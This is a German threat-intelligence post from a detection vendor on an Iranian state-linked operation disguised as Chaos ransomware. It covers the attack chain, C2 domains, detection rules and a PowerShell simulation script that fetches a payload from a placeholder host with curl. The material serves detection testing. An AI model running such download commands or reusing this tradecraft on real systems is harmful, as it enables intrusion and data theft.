SOC Prime Bias: Kritisch

07 May 2026 15:26 UTC
newspaper icon Rapid7

Chaos Ransomware und die staatlich gesponserte Bedrohung dahinter

Author Photo
SOC Prime Team linkedin icon Folgen
Chaos Ransomware und die staatlich gesponserte Bedrohung dahinter
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Zusammenfassung

Anfang 2026 wurde das zunächst als Routine-Chaos-Ransomware-Vorfall angenommene Ereignis später als eine False-Flag-Operation identifiziert, die mit der iranischen staatsnahen Gruppe MuddyWater, auch bekannt als Seedworm, in Verbindung steht. Anstelle sich auf Dateiverschlüsselung zu konzentrieren, nutzten die Angreifer Microsoft Teams für Social Engineering, stahlen Anmeldedaten und MFA-Tokens und setzten einen benutzerdefinierten Downloader zusammen mit einem Remote-Access-Trojaner ein. Die Operation nutzte Infrastruktur, die MuddyWater zugeschrieben wird, einschließlich eines Code-Signatur-Zertifikats, und zielte auf Datendiebstahl und langfristigen Zugang ab.

Untersuchung

Die Ermittler von Rapid7 rekonstruieren die Eindringkette vom auf Teams basierenden Anmeldediebstahl bis hin zur Nutzung legitimer Remote-Administrationstools wie AnyDesk und DWAgent, gefolgt von der Lieferung von ms_upd.exe, die einen benutzerdefinierten RAT namens Game.exeabrufte. Das Team identifizierte Command-and-Control-Domains wie moonzonet.com and uploadfiler.com, zusammen mit mehreren zugehörigen IP-Adressen und einem Signaturzertifikat, das zuvor mit MuddyWater in Verbindung gebracht wurde. Die Malware-Analyse deckte auch Anti-Analyse-Verhalten, einen Mutex, der eine einmalige Ausführung erzwingt, und Persistenzmechanismen, die einen Dienst und versteckte Dateien einbeziehen, auf.

Minderung

Organisationen sollten stärkere MFA-Schutzmaßnahmen durchsetzen, den Fernzugriff auf Desktops und das Bildschirmfreigaben über Teams auf vertrauenswürdige Konten beschränken und darauf achten, dass legitime Remote-Zugriffstools in ungewöhnlichen Kontexten verwendet werden. Anwendungs-Whitelisting sollte auf code-signierte Binärdateien angewendet werden, und die Ausführung unsignierter Dateien aus benutzerzugänglichen Verzeichnissen sollte blockiert werden. Sicherheitsteams sollten außerdem regelmäßig die Nutzung von Zertifikaten überprüfen und die bekannten bösartigen Domains und IP-Adressen, die mit der Kampagne verbunden sind, blockieren.

Reaktion

Wenn diese Aktivität erkannt wird, sollten die betroffenen Systeme sofort isoliert, kompromittierte Anmeldeinformationen und MFA-Tokens widerrufen und die vollständige forensische Sammlung begonnen werden. Die identifizierte Command-and-Control-Infrastruktur sollte blockiert, AnyDesk- und DWAgent-Dienste sollten entfernt und der benutzerdefinierte RAT aus der Umgebung entfernt werden. Die Jagd auf Bedrohungen sollte auch für den Mutex ATTRIBUTES_ObjectKernel und alle verbleibenden Dateien, die unter ProgramData.

"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef file fill:#aaffaa classDef process fill:#ffcc99 classDef malware fill:#ff9999 %% Nodes u2013 Actions action_initial_access["<b>Aktion</b> – <b>T1566 Phishing</b><br/>Der Angreifer sendete bösartige Microsoft Teams Chat-Nachrichten, die Benutzer zu einer gefälschten Quick Assist-Bildschirmfreigabesitzung lockten."] class action_initial_access action action_user_exec_link["<b>Aktion</b> – <b>T1204.001 Nutzung durch Benutzer: Bösartiger Link</b><br/>Opfer klickten auf einen über Teams bereitgestellten bösartigen Link, der den Download von <i>ms_upd.exe</i> initiierte."] class action_user_exec_link action action_user_exec_copypaste["<b>Aktion</b> – <b>T1204.004 Nutzung durch Benutzer: Bösartiges Kopieren und Einfügen</b><br/>Angreifer forderten Benutzer auf, Anmeldedaten in lokal erstellte Textdateien zu kopieren und einzufügen."] class action_user_exec_copypaste action action_cred_access["<b>Aktion</b> – <b>T1552.008 Ungesicherte Anmeldeinformationen</b> & <b>T1078 Gültige Konten</b><br/>Erbeutete Anmeldedaten aus Chatnachrichten und deren Verwendung, um sich in interne Systeme einzuloggen."] class action_cred_access action action_auth_mod["<b>Aktion</b> – <b>T1556.001 Domänencontroller-Authentifizierung</b><br/>Kompromittierte Anmeldedaten wurden verwendet, um sich beim Domänencontroller zu authentifizieren und privilegierten Zugang zu erhalten."] class action_auth_mod action action_discovery["<b>Aktion</b> – <b>T1082 Systeminformationen entdecken</b> & <b>T1016 Systemnetzwerkkonfiguration entdecken</b><br/>Malware sammelte Hostnamen, Benutzernamen, Domänen, IP-Adressen über ipconfig, whoami, etc."] class action_discovery action action_ingress_transfer["<b>Aktion</b> – <b>T1105 Ingress-Tool-Transfer</b><br/><i>ms_upd.exe</i> lud zusätzliche Payloads (WebView2Loader.dll, Game.exe, visualwincomp.txt) mithilfe von Curl herunter."] class action_ingress_transfer action action_execution["<b>Aktion</b> – <b>T1059 Befehl und Skripting-Interpreter</b><br/>Angreifer führten cmd.exe, PowerShell und pythonw.exe aus, um die heruntergeladenen Binärdateien zu starten."] class action_execution action action_process_injection["<b>Aktion</b> – <b>T1055.011 Extra Window Memory Injection</b> & <b>T1055.002 Portable Executable Injection</b><br/>pythonw.exe injizierte Code in angehaltene Prozesse, um den RAT unauffällig zu starten."] class action_process_injection action action_defense_evasion["<b>Aktion</b> – <b>T1027 Verschleierte Dateien oder Informationen</b> & <b>T1497 Virtualisierung/Sandbox-Ausweichung</b><br/>Payloads XORu2011-verschlüsselt, AESu2011256u2011GCM verschlüsselt; überprüft auf Analyse DLLs, VM-Identifikatoren und Timing, um Sandboxedetektion zu vermeiden."] class action_defense_evasion action action_persistence["<b>Aktion</b> – <b>T1219 Remote Access Tools</b><br/>Bereitstellung von DWAgent-Service und AnyDesk für langfristige Fernsteuerung."] class action_persistence action action_lateral_movement["<b>Aktion</b> – <b>T1563 Remote Service Session Hijacking (RDP)</b> & <b>T1668 Exklusive Kontrolle</b><br/>Verwendete legitime RDP-Sitzungen, um seitwärts zu bewegen und Befehle auf weiteren Hosts auszuführen."] class action_lateral_movement action action_collection_exfil["<b>Aktion</b> – <b>T1560 Gesammelte Daten archivieren</b> & <b>T1041 Exfiltration über C2-Kanal</b><br/>Daten archiviert in XORu2011-verschlüsseltem Archiv und hochgeladen auf uploadfiler.com."] class action_collection_exfil action action_c2["<b>Aktion</b> – <b>T1090 Proxy</b> & <b>T1573 Verschlüsselte Kanäle</b><br/>Kommunikation mit C2-Infrastruktur (moonzonet.com, uploadfiler.com) über HTTPS mit verschlüsselten Payloads."] class action_c2 action %% Nodes u2013 Werkzeuge / Dateien / Prozesse / Malware file_ms_upd["<b>Datei</b> – <b>Name</b>: ms_upd.exe<br/><b>Beschreibung</b>: Ursprünglicher Dropper, der weitere Payloads abruft."] class file_ms_upd file file_webview ["<b>Datei</b> – <b>Name</b>: WebView2Loader.dll<br/><b>Beschreibung</b>: Unterstützung für das Rendern von Web-Inhalten."] class file_webview file file_game["<b>Datei</b> – <b>Name</b>: Game.exe<br/><b>Beschreibung</b>: Sekundäre Payload, die nach dem Download ausgeführt wird."] class file_game file file_visual["<b>Datei</b> – <b>Name</b>: visualwincomp.txt<br/><b>Beschreibung</b>: Textdatei für Konfigurationsdaten."] class file_visual file process_cmd["<b>Prozess</b> – <b>Name</b>: cmd.exe<br/><b>Zweck</b>: Führt Kommandozeilenanweisungen aus."] class process_cmd process process_ps["<b>Prozess</b> – <b>Name</b>: PowerShell<br/><b>Zweck</b>: Führt PowerShell-Skripte zur Payload-Ausführung aus."] class process_ps process process_python["<b>Prozess</b> – <b>Name</b>: pythonw.exe<br/><b>Zweck</b>: Führt Python-basierte Komponenten aus und führt Prozessinjektion durch."] class process_python process malware_dwaga["<b>Malware</b> – <b>Name</b>: DWAgent-Dienst<br/><b>Zweck</b>: Bietet persistenten Fernzugriff."] class malware_dwaga malware tool_anydesk["<b>Werkzeug</b> – <b>Name</b>: AnyDesk<br/><b>Beschreibung</b>: Legitimes Remote-Desktop-Tool, das für Persistenz und laterale Bewegung verwendet wird."] class tool_anydesk tool %% Connections u2013 Ablauf action_initial_access –>|führt zu| action_user_exec_link action_user_exec_link –>|lädt herunter| file_ms_upd action_user_exec_link –>|führt zu| action_user_exec_copypaste action_user_exec_copypaste –>|stellt bereit| action_cred_access action_cred_access –>|ermöglicht| action_auth_mod action_auth_mod –>|ermöglicht| action_discovery action_discovery –>|löst aus| action_ingress_transfer action_ingress_transfer –>|lädt herunter| file_webview action_ingress_transfer –>|lädt herunter| file_game action_ingress_transfer –>|lädt herunter| file_visual action_ingress_transfer –>|führt zu| action_execution action_execution –>|führt aus| process_cmd action_execution –>|führt aus| process_ps action_execution –>|führt aus| process_python process_python –>|injiziert| action_process_injection action_process_injection –>|erleichtert| action_defense_evasion action_defense_evasion –>|ermöglicht| action_persistence action_persistence –>|installiert| malware_dwaga action_persistence –>|installiert| tool_anydesk malware_dwaga –>|unterstützt| action_lateral_movement tool_anydesk –>|unterstützt| action_lateral_movement action_lateral_movement –>|sammelt| action_collection_exfil action_collection_exfil –>|exfiltriert via| action_c2 %% Styling class action_initial_access,action_user_exec_link,action_user_exec_copypaste,action_cred_access,action_auth_mod,action_discovery,action_ingress_transfer,action_execution,action_process_injection,action_defense_evasion,action_persistence,action_lateral_movement,action_collection_exfil,action_c2 action class file_ms_upd,file_webview,file_game,file_visual file class process_cmd,process_ps,process_python process class malware_dwaga malware class tool_anydesk tool "

Angriffsfluss

Erkennungen

Mögliche Systemnetzwerkkonfigurationserkennung (über cmdline)

SOC Prime Team
06. Mai 2026

Anzeigen

Mögliche PING-Nutzung zur Ausführungsverzögerung (über cmdline)

SOC Prime Team
06. Mai 2026

Anzeigen

Alternative Fernzugriffs-/Managementsoftware (über Prozesserstel

SOC Prime Team
06. Mai 2026

Anzeigen

Verdächtige CURL-Nutzung (über cmdline)

SOC Prime Team
06. Mai 2026

Anzeigen

Verdächtiger Dateidownload über direkte IP (über Proxy)

SOC Prime Team
06. Mai 2026

Anzeigen

IOCs (HashSha256) zur Erkennung: Spuren verwischen: Der staatlich geförderte Schatten hinter der Chaos-Ransomware

SOC Prime AI Regeln
06. Mai 2026

Anzeigen

IOCs (HashSha1) zur Erkennung: Spuren verwischen: Der staatlich geförderte Schatten hinter der Chaos-Ransomware

SOC Prime AI Regeln
06. Mai 2026

Anzeigen

IOCs (HashMd5) zur Erkennung: Spuren verwischen: Der staatlich geförderte Schatten hinter der Chaos-Ransomware

SOC Prime AI Regeln
06. Mai 2026

Anzeigen

IOCs (Quell-IP) zur Erkennung: Spuren verwischen: Der staatlich geförderte Schatten hinter der Chaos-Ransomware

SOC Prime AI Regeln
06. Mai 2026

Anzeigen

IOCs (Ziel-IP) zur Erkennung: Spuren verwischen: Der staatlich geförderte Schatten hinter der Chaos-Ransomware

SOC Prime AI Regeln
06. Mai 2026

Anzeigen

Verdächtiges Remote-Management-Tool und Entdeckungsbefehlsausführung [Windows-Prozesserstellung]

SOC Prime AI Regeln
06. Mai 2026

Anzeigen

Erkennung interaktiver Anmeldungen und Änderungen der MFA-Konfiguration [Microsoft Windows Security Event Log]

SOC Prime AI Regeln
06. Mai 2026

Anzeigen

Simulationsexekution

Voraussetzung: Die Telemetrie- & Basislinien-Vorflugprüfung muss bestanden sein.

Begründung: In diesem Abschnitt wird die präzise Ausführung der gegnerischen Technik (TTP) beschrieben, die entwickelt wurde, um die Erkennungsregel auszulösen. Die Befehle und das Narrativ MÜSSEN direkt die identifizierten TTPs widerspiegeln und sollen genau die Telemetrie erzeugen, die von der Detektionslogik erwartet wird.

  • Angriffsablauf & Befehle:

    1. Einen Fernzugriffspunkt etablieren unter Verwendung des legitimen Remote-Management-Tools AnyDesk.exe (Spiegelung des “remote-tool” Selektors).
    2. Netzwerkerkennung durchführen durch Ausführung von ipconfig and whoami aus derselben Sitzung – erfüllend den “Entdeckungsbefehl” Selektor.
    3. Einen bösartigen Payload herunterladen mit curl aufgerufen durch cmd.exe, eine klassische Technik für „Ingress-Tool-Transfer“ (T1105) und „Befehlszeilen-Schnittstelle“ (T1059).
    4. Führen Sie die Payload aus um die Kill-Chain zu vervollständigen (nicht erforderlich für die Regelvalidierung, aber zur Realitätsnähe enthalten).

  • Regressionstest-Skript:

    # -------------------------------------------------
# Simulationsskript – triggert die Sigma-Regel
# -------------------------------------------------
# 1. Starten Sie AnyDesk (simuliert – es wird angenommen, dass AnyDesk im PATH ist)
Start-Process -FilePath "AnyDesk.exe" -ArgumentList "--no-sandbox" -WindowStyle Hidden

# 2. Entdeckungsbefehle ausführen
$discovery = @(
    "ipconfig /all",
    "whoami",
    "net start"
)
foreach ($cmd in $discovery) {
    cmd.exe /c $cmd | Out-Null
}

# 3. Verwenden Sie cmd.exe + curl, um eine Dummy-Payload abzurufen
$payloadUrl = "http://example.com/malicious.exe"
$outputPath = "$env:TEMPpayload.exe"
$downloadCmd = "curl $payloadUrl -o $outputPath"
cmd.exe /c $downloadCmd

# Optional: Führen Sie die Payload aus (aus Sicherheitsgründen kommentiert)
# Start-Process -FilePath $outputPath -WindowStyle Hidden
# -------------------------------------------------

  • Bereinigungskommandos:

    # Beenden Sie AnyDesk, falls gestartet
Get-Process -Name "AnyDesk" -ErrorAction SilentlyContinue | Stop-Process -Force

# Entfernen Sie die heruntergeladene Payload
Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue

# Löschen Sie alle verbleibenden cmd.exe-Instanzen, die vom Skript erstellt wurden
Get-Process -Name "cmd" -ErrorAction SilentlyContinue | Stop-Process -Force

Ende des Berichts

Treten Sie der Detection as Code-Plattform von SOC Prime bei um die Sichtbarkeit der für Ihr Unternehmen relevantesten Bedrohungen zu verbessern. Um Ihnen den Einstieg zu erleichtern und unmittelbaren Mehrwert zu erzielen, buchen Sie jetzt ein Treffen mit den Experten von SOC Prime.

Kostenlos beitreten